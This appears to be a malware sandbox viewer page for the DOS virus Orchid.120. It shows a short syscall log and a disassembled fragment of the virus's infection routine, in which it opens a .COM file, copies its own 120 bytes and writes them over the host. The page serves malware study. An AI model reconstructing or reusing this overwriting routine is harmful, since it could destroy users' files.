Sample viewer

vx.netlux.org/Virus.DOS.Orchid.120

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:18.953586861Z 78 PC: 12a4d | Find first file
2018-12-17T22:42:18.959439024Z 44 PC: 12a51 | Get time 0x12a51: mov byte ptr [0x173], dl
0x12a55: cmp dl, 0x50
0x12a58: jae 0x12a85
0x12a5a: mov ax, 0x3d02
0x12a5d: mov dx, 0x9e
0x12a60: int 0x21
0x12a62: mov bx, ax
0x12a64: mov cx, 0x78
0x12a67: mov si, 0x100
0x12a6a: mov di, 0x200
0x12a6d: rep movsb byte ptr es:[di], byte ptr [si]
0x12a6f: jmp 0x12b72
0x12a72: call 0x12aa9
0x12a75: mov ah, 0x40
0x12a77: mov dx, 0x100
0x12a7a: mov cx, 0x78
0x12a7d: int 0x21
0x12a7f: mov ah, 0x3e
0x12a81: int 0x21
0x12a83: int 0x20
2018-12-17T22:42:18.96105853Z 61 PC: 12a62 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:42:18.965234336Z 64 PC: 12b7f | Write file or device (Write 120 bytes on handle 5)
2018-12-17T22:42:18.969722923Z 62 PC: 12b83 | Close file